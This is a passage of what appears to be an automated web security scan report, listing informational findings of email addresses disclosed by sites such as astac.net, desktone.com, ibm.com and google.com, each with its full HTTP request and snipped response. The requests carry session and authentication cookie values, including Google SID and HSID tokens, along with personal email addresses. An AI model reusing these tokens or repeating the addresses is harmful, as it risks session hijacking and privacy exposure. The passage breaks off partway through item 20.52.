20.36. http://www.astac.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.astac.net
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.astac.net
Proxy-Connection: keep-alive
Referer: http://www.aradial.com/aradial-radius-server-billing-customers.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:45:51 GMT
Server: Apache
Content-Type: text/html;charset=UTF-8
Content-Length: 17138


<!-- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitio
...[SNIP]...
<a href="mailto:info@astac.net">info@astac.net</a>
...[SNIP]...

20.37. http://www.astac.net/js/extjs/adapter/jquery/ext-jquery-adapter.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.astac.net
Path:   /js/extjs/adapter/jquery/ext-jquery-adapter.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/extjs/adapter/jquery/ext-jquery-adapter.js HTTP/1.1
Host: www.astac.net
Proxy-Connection: keep-alive
Referer: http://www.astac.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A14D69ACDD93A57A2D7CD8D65BE69286

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:45:53 GMT
Server: Apache
Last-Modified: Tue, 27 Apr 2010 18:00:52 GMT
ETag: "648fcc-4eca-ac973d00"
Accept-Ranges: bytes
Content-Length: 20170
Content-Type: application/x-javascript

/*
* Ext JS Library 3.2.1
* Copyright(c) 2006-2010 Ext JS, Inc.
* licensing@extjs.com
* http://www.extjs.com/license
*/
window.undefined=window.undefined;Ext={version:"3.2.1",versionDetail:{major:3,minor:2,patch:1}};Ext.apply=function(d,e,b){if(b){Ext.apply(d,b)}if(d&&e&&typeof e=="o
...[SNIP]...

20.38. http://www.astac.net/js/extjs/ext-all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.astac.net
Path:   /js/extjs/ext-all.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /js/extjs/ext-all.js HTTP/1.1
Host: www.astac.net
Proxy-Connection: keep-alive
Referer: http://www.astac.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A14D69ACDD93A57A2D7CD8D65BE69286

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:45:53 GMT
Server: Apache
Last-Modified: Tue, 27 Apr 2010 18:00:56 GMT
ETag: "648fdd-a57bb-acd44600"
Accept-Ranges: bytes
Content-Length: 677819
Content-Type: application/x-javascript

/*
* Ext JS Library 3.2.1
* Copyright(c) 2006-2010 Ext JS, Inc.
* licensing@extjs.com
* http://www.extjs.com/license
*/
Ext.DomHelper=function(){var w=null,k=/^(?:br|frame|hr|img|input|link|meta|range|spacer|wbr|area|param|col)$/i,m=/^table|tbody|tr|td$/i,d=/tag|children|cn|html$/i,s
...[SNIP]...
\/([\-\w]+\.)+\w{2,3}(\/[%\-\w]+(\.\w{2,})?)*(([\w\-\.\?\\\/+@&#;`~=%!]*)(\.\w{2,})?)*\/?)/i;return{email:function(e){return b.test(e)},emailText:'This field should be an e-mail address in the format "user@example.com"',emailMask:/[a-z0-9_\.\-@\+]/i,url:function(e){return a.test(e)},urlText:'This field should be a URL in the format "http://www.example.com"',alpha:function(e){return c.test(e)},alphaText:"This field
...[SNIP]...

20.39. http://www.astac.net/js/extjs/resources/css/ext-all.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.astac.net
Path:   /js/extjs/resources/css/ext-all.css

Issue detail

The following email address was disclosed in the response:

Request

GET /js/extjs/resources/css/ext-all.css HTTP/1.1
Host: www.astac.net
Proxy-Connection: keep-alive
Referer: http://www.astac.net/servlet/content/15.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A14D69ACDD93A57A2D7CD8D65BE69286

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:46:27 GMT
Server: Apache
Last-Modified: Wed, 18 May 2011 05:45:57 GMT
ETag: "680ff4-210ce-6711af40"
Accept-Ranges: bytes
Content-Length: 135374
Content-Type: text/css

/*!
* Ext JS Library 3.2.1
* Copyright(c) 2006-2010 Ext JS, Inc.
* licensing@extjs.com
* http://www.extjs.com/license
*/
html,div,dl,dt,ol,ul,dd,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,p,blockquote,th,td_{margin:0;padding:0;}img,html{border:0;}address,caption,cite,code,dfn,em,str
...[SNIP]...

20.40. http://www.bradsdeals.com/res/opt/global.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bradsdeals.com
Path:   /res/opt/global.js

Issue detail

The following email address was disclosed in the response:

Request

GET /res/opt/global.js?v=20110829 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=40626594; CFTOKEN=23649149; TID=306656; LB-Persist=/pPhdebA/HT971C4FjQO/6Xok17iTa3KEc4Lh3NCVVGPLf87tgiQBEUoPmU9nYohCXdgBLGdk6jTDw==

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Last-Modified: Mon, 29 Aug 2011 21:05:22 GMT
Accept-Ranges: bytes
ETag: "095625d8f66cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:34:45 GMT
Content-Length: 192992

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

20.41. http://www.desktone.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.desktone.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.desktone.com
Proxy-Connection: keep-alive
Referer: http://info.desktone.com/gaw.hosted.virtual.desktop.free.trial.html?_kk=VDI&_kt=31d1a2bd-f653-42ac-b143-8a094cde83dc&gclid=COryhqeCo6sCFTEaQgodYAJH4g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:070-XIP-593&token:_mch-desktone.com-1316237201401-57160

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:26:04 GMT
Server: Apache/2.2.20 (FreeBSD) mod_ssl/2.2.20 OpenSSL/0.9.8n DAV/2 PHP/5.3.8 with Suhosin-Patch SVN/1.6.17
X-Powered-By: PHP/5.3.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 12480
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <meta name="
...[SNIP]...
<a href="mailto:info@desktone.com">info@desktone.com</a>
...[SNIP]...

20.42. http://www.desktone.com/sup/js/lib/colorbox/jquery.colorbox-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.desktone.com
Path:   /sup/js/lib/colorbox/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /sup/js/lib/colorbox/jquery.colorbox-min.js HTTP/1.1
Host: www.desktone.com
Proxy-Connection: keep-alive
Referer: http://www.desktone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:070-XIP-593&token:_mch-desktone.com-1316237201401-57160; PHPSESSID=17c390f4ca291b33543d7623701803ab

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:26:07 GMT
Server: Apache/2.2.20 (FreeBSD) mod_ssl/2.2.20 OpenSSL/0.9.8n DAV/2 PHP/5.3.8 with Suhosin-Patch SVN/1.6.17
Last-Modified: Wed, 10 Nov 2010 22:29:22 GMT
ETag: "1c6494-5c28-494ba638f3480"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 23592
Content-Type: application/javascript

// ColorBox v1.3.14 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2010 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function ($, window) {
   
   var
   // ColorBox Default Settings.    
   // See http://colorpowered.com/colorbox for detail
...[SNIP]...

20.43. http://www.disenter.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.disenter.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.disenter.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 28364

<html>
<head>
<TITLE>Free Usenet News Servers Database Index and Search</TITLE>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" >
<meta name="keywords" content="free news server
...[SNIP]...
<a href="mailto:jim@smartimpulse.com">
...[SNIP]...

20.44. http://www.enstarllc.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.enstarllc.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.enstarllc.com
Proxy-Connection: keep-alive
Referer: http://info.mailtraq.com/wac
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: 9602-query=; path=/; HttpOnly;
Set-Cookie: 9602%2Duserid=%2D810260; expires=Fri, 14-Sep-2012 23:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:50:08 GMT
Connection: close

<html><head><title>Mailtraq email server - The complete SMTP/POP3/IMAP windows email server solution - Mailtraq eMail server</title><meta name="description" content="Simply the most flexible Windows M
...[SNIP]...
<a href="mailto:support@enstar.net?subject=Add Proxy to Mailtraq">
...[SNIP]...
<a href="mailto:sales@enstar.net?subject=Mailtraq GBP-EU enquiry">
...[SNIP]...

20.45. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The following email address was disclosed in the response:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=nntp+server HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=sK4D6Ekqiq5x2aIbfG65p0N2bY_ck2S7XMaUrDs_B5DJ1iJfkQNtuQI8wOg2lKG4sBjrjWXSg7pA0iwTqjrJ-gxxWdfY8fs1gpCmxlTKp0PssKiWQtHPYPS35cLQE0Df; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjLggJuPZagSb_-dzKijS1WNMY9j-KLCCbIkdL5gFUKxj425Av1q5M48IS5j1lYOObs1zt7iBSUPDIs8jDHA7BNSVBwNR2nv_wfJPRoa5UYs7rUEP3-cdk3lbIVVG7eniEMusm6ux7K_9KyH7qPXchvacU1HerezJNMU_4wP5jYYqqnYQQmTLUmsqdiiIkvWpvD7gxzfPW2Y7ijG9aRGGBnwWnoSSqmkJqo5RS7cgEFhp_Lzt2RC_Uv98s0HAymWMstKwJjU4OCemwWpmfSMU83cZ-hazCj5scCqbY8o2nlC4

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:05 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/sXoKgwNA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 117068

<!doctype html> <head> <title>nntp server - Google Search</title> <script>window.google={kEI:"-aNzTtndCJDKiAKTz9izAg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid")
...[SNIP]...
on(){m.prm&&m.prm()},Ta=function(a){s("m",function(){m.spn(a)})},Ua=function(a){s("m",function(){m.spp(a)})};n("spn",Ta);n("spp",Ua);Aa("gbd4",Sa);
if(_tvb("true",e)){var Va={g:_tvv("1"),d:_tvv(""),e:"test@fastdial.net",m:"fastdial.net",p:"//lh4.googleusercontent.com/-V_veHrrsDKY/AAAAAAAAAAI/AAAAAAAAAAA/XUAjI0bxyLA/s96-c/photo.jpg",xp:_tvv("1"),mg:"%1$s (delegated)",md:"%1$s (default)"};o.prf=Va}
if(_tvv("1")&&_tvv(
...[SNIP]...
<span id=gbi4m1>test@fastdial.net</span>
...[SNIP]...
<span class=gbps2>test@fastdial.net</span>
...[SNIP]...

20.46. http://www.ibm.com/developerworks/js/jquery/cluetipdwtag/jquery.dimensions.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/js/jquery/cluetipdwtag/jquery.dimensions.min.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /developerworks/js/jquery/cluetipdwtag/jquery.dimensions.min.js HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/developerworks/forums/thread.jspa?messageID=14644760
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www-142.ibm.com/software/products/us/en/search%3Fpgel%3Dlnav%26hppcode%3D1%26st%3Dnew%26q1%3Dxss; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BvNLyPzxNajEfgFdmrEFjxa:12too2opq; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:56:02 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Last-Modified: Mon, 16 Feb 2009 17:13:47 GMT
ETag: "46a9b-9d2-4f3d08c0"
Accept-Ranges: bytes
ntCoent-Length: 2514
Content-Type: application/x-javascript
Vary: User-Agent, Accept-Encoding
Content-Length: 2514

/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $LastCha
...[SNIP]...

20.47. http://www.ibm.com/developerworks/js/jquery/cluetipdwtag/jquery.hoverIntent.minified.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/js/jquery/cluetipdwtag/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

Request

GET /developerworks/js/jquery/cluetipdwtag/jquery.hoverIntent.minified.js HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/developerworks/forums/thread.jspa?messageID=14644760
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www-142.ibm.com/software/products/us/en/search%3Fpgel%3Dlnav%26hppcode%3D1%26st%3Dnew%26q1%3Dxss; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BvNLyPzxNajEfgFdmrEFjxa:12too2opq; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:56:03 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Last-Modified: Mon, 16 Feb 2009 17:13:47 GMT
ETag: "46a9c-649-4f3d08c0"
Accept-Ranges: bytes
ntCoent-Length: 1609
Content-Type: application/x-javascript
Vary: User-Agent, Accept-Encoding
Content-Length: 1609

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

20.48. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/rational/library/08/0325_segal/index.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /developerworks/rational/library/08/0325_segal/index.html HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search/?sn=dw&lang=en&cc=US&en=utf&hpp=20&dws=dw&q=xss&Search=Search
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.redbooks.ibm.com/cgi-bin/searchsite.cgi%3Fquery%3Dxss; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BvNLyPzxNajEfgFdmrEFjxa:12too2opq; mbox=check#true#1316221073|session#1316221012167-554408#1316222873

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:55:56 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 90352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<div id="authortip1" class="dwauthor-onload-state ibm-no-print">If you have questions or would like to discuss what you read in this article, please contact Ory Segal (SEGALORY@il.ibm.com).
Ory Segal is Director of Security Research, responsible for researching technologies and recommending strategic direction for IBM Rational...s market leading Web application security product AppScan
...[SNIP]...
</a>If you have questions or would like to discuss what you read in this article, please contact Ory Segal (SEGALORY@il.ibm.com).
Ory Segal is Director of Security Research, responsible for researching technologies and recommending strategic direction for IBM Rational...s market leading Web application security product AppScan
...[SNIP]...
<div class="metavalue">author1-email=dwinfo@us.ibm.com</div><div class="metavalue">author1-email-cc=clarkega@us.ibm.com</div>
...[SNIP]...

20.49. http://www.ibm.com/developerworks/tivoli/library/s-csscript/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/tivoli/library/s-csscript/

Issue detail

The following email address was disclosed in the response:

Request

GET /developerworks/tivoli/library/s-csscript/ HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search?sn=mh&q=xss&lang=en&cc=us&en=utf
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.vm.ibm.com/overview/; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:55:06 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 81509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="mailto:paul@ca.ibm.com?subject=Cross-site scripting">paul@ca.ibm.com</a>
...[SNIP]...
<a href="mailto:paul@ca.ibm.com">paul@ca.ibm.com</a>
...[SNIP]...
<a href="mailto:paul@ca.ibm.com">paul@ca.ibm.com</a>
...[SNIP]...
<div class="metavalue">author1-email=paul@ca.ibm.com</div>
...[SNIP]...

20.50. http://www.itoncommand.com/Awards.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itoncommand.com
Path:   /Awards.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /Awards.aspx HTTP/1.1
Host: www.itoncommand.com
Proxy-Connection: keep-alive
Referer: http://www.itoncommand.com/WhyIToC.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32598374.1678495615.1316237218.1316237218.1316237218.1; __utmb=32598374.8.10.1316237218; __utmc=32598374; __utmz=32598374.1316237218.1.1.utmcsr=google|utmccn=Campaign%20|utmcmd=cpc|utmctr=VDI

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sat, 17 Sep 2011 00:29:37 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Cache-Control: private
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Vary: Accept-Encoding
Content-Length: 31385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml">

<head><meta name="
...[SNIP]...
<a href="mailto:sales@itoncommand.com?subject=Web Inquiry" class="style39">
...[SNIP]...
<a href="mailto:helpdesk@itoncommand.com?subject=Helpdesk request from web site" class="style39">
...[SNIP]...
<!-- a href="mailto:anueske@itoncommand.com?subject=Get A Quote"-->
...[SNIP]...

20.51. http://www.itoncommand.com/CaseStudies.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itoncommand.com
Path:   /CaseStudies.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /CaseStudies.aspx HTTP/1.1
Host: www.itoncommand.com
Proxy-Connection: keep-alive
Referer: http://www.itoncommand.com/Products.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32598374.1678495615.1316237218.1316237218.1316237218.1; __utmb=32598374.2.10.1316237218; __utmc=32598374; __utmz=32598374.1316237218.1.1.utmcsr=google|utmccn=Campaign%20|utmcmd=cpc|utmctr=VDI

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sat, 17 Sep 2011 00:28:57 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Cache-Control: private
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Vary: Accept-Encoding
Content-Length: 114216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml">

<head><meta name="
...[SNIP]...
<a href="mailto:sales@itoncommand.com?subject=Web Inquiry" class="style39">
...[SNIP]...
<a href="mailto:helpdesk@itoncommand.com?subject=Helpdesk request from web site" class="style39">
...[SNIP]...
<!-- a href="mailto:anueske@itoncommand.com?subject=Get A Quote"-->
...[SNIP]...

20.52. http://www.itoncommand.com/Downloads.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itoncommand.com
Path:   /Downloads.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /Downloads.aspx HTTP/1.1
Host: www.itoncommand.com
Proxy-Connection: keep-alive
Referer: http://www.itoncommand.com/Support.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
